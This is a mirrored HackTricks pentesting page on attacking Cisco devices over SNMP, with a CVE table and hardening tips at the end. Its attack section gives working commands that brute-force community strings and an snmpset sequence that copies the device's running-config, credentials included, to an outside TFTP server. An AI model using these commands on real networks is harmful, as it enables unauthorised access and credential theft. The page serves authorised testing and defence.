maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-snmp/cisco-snmp.md

4.5 KiB
Raw Blame History

Cisco SNMP

{{#include ../../banners/hacktricks-training.md}}

Pentesting Cisco Networks

SNMP functions over UDP with ports 161/UDP for general messages and 162/UDP for trap messages. This protocol relies on community strings, serving as plaintext "passwords" that enable communication between SNMP agents and managers. These strings determine the access level, specifically read-only (RO) or read-write (RW) permissions.

A classic—yet still extremely effective—attack vector is to brute-force community strings in order to elevate from unauthenticated user to device administrator (RW community).
A practical tool for this task is onesixtyone:

onesixtyone -c community_strings.txt -i targets.txt

Other fast options are the Nmap NSE script snmp-brute or Hydra's SNMP module:

nmap -sU -p161 --script snmp-brute --script-args brute.community=wordlist 10.0.0.0/24
hydra -P wordlist.txt -s 161 10.10.10.1 snmp

Dumping configuration through SNMP (CISCO-CONFIG-COPY-MIB)

If you obtain an RW community you can copy the running-config/startup-config to a TFTP/FTP server without CLI access by abusing the CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96). Two common approaches are:

  1. Nmap NSE snmp-ios-config
nmap -sU -p161 --script snmp-ios-config \
     --script-args creds.snmp=private 192.168.66.1

The script automatically orchestrates the copy operation and prints the configuration to stdout .

  1. Manual snmpset sequence
# Copy running-config (4) to a TFTP server (1)  random row id 1234
snmpset -v2c -c private 192.168.66.1 \
  1.3.6.1.4.1.9.9.96.1.1.1.1.2.1234 i 1 \    # protocol = tftp
  1.3.6.1.4.1.9.9.96.1.1.1.1.3.1234 i 4 \    # sourceFileType = runningConfig
  1.3.6.1.4.1.9.9.96.1.1.1.1.4.1234 i 1 \    # destFileType   = networkFile
  1.3.6.1.4.1.9.9.96.1.1.1.1.5.1234 a 10.10.14.8 \ # TFTP server IP
  1.3.6.1.4.1.9.9.96.1.1.1.1.6.1234 s \"backup.cfg\" \\
  1.3.6.1.4.1.9.9.96.1.1.1.1.14.1234 i 4       # rowStatus = createAndGo

Row identifiers are one-shot; reuse within five minutes triggers inconsistentValue errors.

Once the file is on your TFTP server you can inspect credentials (enable secret, username <user> secret, etc.) or even push a modified config back to the device.

Metasploit goodies

  • cisco_config_tftp downloads running-config/startup-config via TFTP after abusing the same MIB.
  • snmp_enum collects device inventory information, VLANs, interface descriptions, ARP tables, etc.
use auxiliary/scanner/snmp/snmp_enum
set RHOSTS 10.10.100.10
set COMMUNITY public
run

Recent Cisco SNMP vulnerabilities (2023 2025)

Keeping track of vendor advisories is useful to scope zero-day-to-n-day opportunities inside an engagement:

Year CVE Affected feature Impact
2025 CVE-2025-20174 SNMP subsystem Crafted packet leads to authenticated DoS (reload) on IOS/IOS-XE (v1/v2c/v3).
2024 CVE-2024-20373 IPv4 ACL handling Mis-configured extended ACLs silently fail, allowing unauthenticated SNMP polling when a valid community/user is known.
2025 (no CVE yet) SNMPv3 configuration restriction bypass Valid v3 user can poll from addresses that should be denied.

Exploitability often still depends on possessing the community string or v3 credentials—another reason why brute-forcing them remains relevant.

Hardening & Detection tips

  • Upgrade to a fixed IOS/IOS-XE version (see Cisco advisory for the CVE above).
  • Prefer SNMPv3 with authPriv (SHA-256/AES-256) over v1/v2c. 
    snmp-server group SECURE v3 priv
snmp-server user monitor SECURE v3 auth sha <authpass> priv aes 256 <privpass>
  • Bind SNMP to a management VRF and restrict with standard numbered IPv4 ACLs (extended named ACLs are risky CVE-2024-20373).
  • Disable RW communities; if operationally required, limit them with ACL and views:
    snmp-server community <string> RW 99 view SysView
  • Monitor for:
    • UDP/161 spikes or unexpected sources (SIEM rules).
    • CISCO-CONFIG-MAN-MIB::ccmHistoryEventConfigSource events indicating out-of-band config changes.
  • Enable SNMPv3 logging and snmp-server packetsize 1500 to reduce certain DoS vectors.

References

  • Cisco: How To Copy Configurations To and From Cisco Devices Using SNMP
  • Cisco Security Advisory cisco-sa-snmp-uwBXfqww (CVE-2024-20373)

{{#include ../../banners/hacktricks-training.md}}